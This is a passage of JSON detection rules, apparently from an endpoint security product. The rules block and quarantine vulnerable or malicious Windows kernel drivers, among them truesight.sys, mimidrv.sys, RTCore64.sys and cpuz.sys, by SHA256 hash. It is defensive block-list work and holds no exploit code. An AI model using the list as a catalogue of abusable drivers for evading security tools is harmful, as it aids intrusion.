+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dc6f8fab6fb713f0cc635a816bea4b64ba0243624ec880bfe7a9829649a2bfbb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82da04eb-23a1-5e82-abdc-a2bd1f12eab6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477675Z",
+ "creation_date": "2026-03-23T11:45:31.477679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477689Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49375b39428fa7c8e55b0bcdbbbbc27668faa934a401ec91fd88a33ab4b2375d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82dde3e3-91d9-5ebb-a6df-e79c402e36dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466551Z",
+ "creation_date": "2026-03-23T11:45:30.466555Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466564Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee525b90053bb30908b5d7bf4c5e9b8b9d6b7b5c9091a26fa25d30d3ad8ef5d0",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82ded53d-72a6-5963-a6ec-4fa5655c60cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147058Z",
+ "creation_date": "2026-03-23T11:45:32.147060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147066Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "206f27ae820783b7755bca89f83a0fe096dbb510018dd65b63fc80bd20c03261",
+ "comment": "Vulnerable Kernel Driver (aka NSecKrnl.sys) [https://x.com/anylink20240604/status/1967181190949228608] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82e629a7-d57f-56b2-abdc-8b2a234fa160",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146136Z",
+ "creation_date": "2026-03-23T11:45:32.146138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146144Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "167730744bd7cb117aae9931f81d20cbd2ec6eee480388c53d2fc973ede920ea",
+ "comment": "Malicious Kernel Driver (aka driver_16773074.sys) [https://www.loldrivers.io/drivers/a0f0d0db-15a2-48e4-af39-50967ee8b541/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82e85799-6767-5d9a-9086-84111b4537a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476800Z",
+ "creation_date": "2026-03-23T11:45:30.476804Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476813Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2a330131ca4a9499736fdc72e819a6ff1f883b1c6dc7b83d5b69d288508e0fe",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82e9c5c2-ca8e-512a-829f-23b7815fd613",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608014Z",
+ "creation_date": "2026-03-23T11:45:29.608016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608022Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5182caf10de9cec0740ecde5a081c21cdc100d7eb328ffe6f3f63183889fec6b",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82efc428-68e5-51da-93a0-77d5150ad7ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826314Z",
+ "creation_date": "2026-03-23T11:45:31.826316Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9dfeef1377073421a97c12fc8d6f1de1ef29835b4cae03a2f9347a5e68b3ec62",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82f16176-a88d-5f84-9c2b-effc1931c29b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984286Z",
+ "creation_date": "2026-03-23T11:45:29.984288Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984293Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "457e2eb5ee1def0e336463b7f62dcc02fdde307b817cf750907a5f5465c4dcb7",
+ "comment": "Vulnerable Kernel Driver (aka irec.sys) [https://www.loldrivers.io/drivers/d74fdf19-b4b0-4ec2-9c29-4213b064138b/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82f36c10-f4f8-5879-b5c6-96147861cbfe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820725Z",
+ "creation_date": "2026-03-23T11:45:31.820729Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820737Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db5c7773b067c9671fff4b0fbc3c27a2d9fddfd4ca79d2bab56b9619a3de625a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82f4cd57-63b7-5b48-a3cf-a9682dea8d7d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812454Z",
+ "creation_date": "2026-03-23T11:45:31.812456Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812461Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5825bece9c191da9975c36a96a9b507840a54628085f3beb06c8f610d59bb467",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "830dcca3-ad41-5a5b-9dfc-9f1042a24390",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985412Z",
+ "creation_date": "2026-03-23T11:45:29.985414Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985419Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "961012d06eeaabd9eff9b36173e566bf148a5c8f743f3329c70d8918eba26093",
+ "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8311bac2-b999-56f6-9e7f-3282783a7d40",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816320Z",
+ "creation_date": "2026-03-23T11:45:30.816322Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816328Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0e4d3e1f5d5942aaf2c72631e9490eecc4d295ee78c323d8fe05092e5b788eb",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "831538aa-6315-5a7f-9748-81cb92f646cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492002Z",
+ "creation_date": "2026-03-23T11:45:31.492004Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492009Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5afa53cab2140ac26e16da42fc50a74e0c3a8cd3d44c3803f3168b9f3223ef7c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83231f59-2a54-5958-bee7-0928e6edba6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604861Z",
+ "creation_date": "2026-03-23T11:45:29.604863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604868Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c66af86b1c024969f80c1daf1c11ed88467035853083a2abf955e22171c63542",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83364ac4-7213-5896-8f72-dde1c1a44db8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462370Z",
+ "creation_date": "2026-03-23T11:45:30.462373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462382Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed8d68c07947c01ca03d886e6ca795a3f8b2f079e8292f019bba3b97b41eef54",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "834cbdee-0c88-58aa-9ddd-5a6c55b2a0a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474217Z",
+ "creation_date": "2026-03-23T11:45:30.474220Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d130e3e052b09dc154c32c170c227f7baaf74fa7767943478876c744fc3d026d",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "834eb938-6551-571d-a528-4bf90e486883",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484245Z",
+ "creation_date": "2026-03-23T11:45:31.484249Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484258Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b446c8359d0d991f332b79adb9591e835a3c4b8fbf874047414f9456e6a728b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8350dc32-12f7-5ed3-b0db-4948e17739cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835737Z",
+ "creation_date": "2026-03-23T11:45:30.835739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82363ae5ac1f8f33cb83fbf9405fac2d77aa754e1e8a88a517656f19c0d12e67",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83575387-f3ee-5e60-a7bc-4a52d242b24d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971839Z",
+ "creation_date": "2026-03-23T11:45:29.971841Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971847Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25c423b2170e7cb44134da651e87708631be0c9db8713c0bdb7b917c76c338a7",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83591fac-4d50-5ccb-ac60-934e7c3f7518",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467151Z",
+ "creation_date": "2026-03-23T11:45:30.467154Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467164Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6416ea9d2a15899dbf4a98b70bdedb4cc6eaf748c14c554b26ae2fe57ef8aa2a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8360097e-3230-5dff-b5d2-c72120081da4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611601Z",
+ "creation_date": "2026-03-23T11:45:29.611603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611608Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ce4a30668938fb7785c9958772e3c171af320ecfea8fc298160e80fbf80fb73",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8360b943-3852-55e4-a030-f7ec7a7d0b8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824636Z",
+ "creation_date": "2026-03-23T11:45:30.824639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fac6ae01d22d719a4f0cc2b9c761c1a81009ce9ebe7e47b96c8ebf32b810d219",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "83785a38-cded-55b0-8bc5-3a6304e50edb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
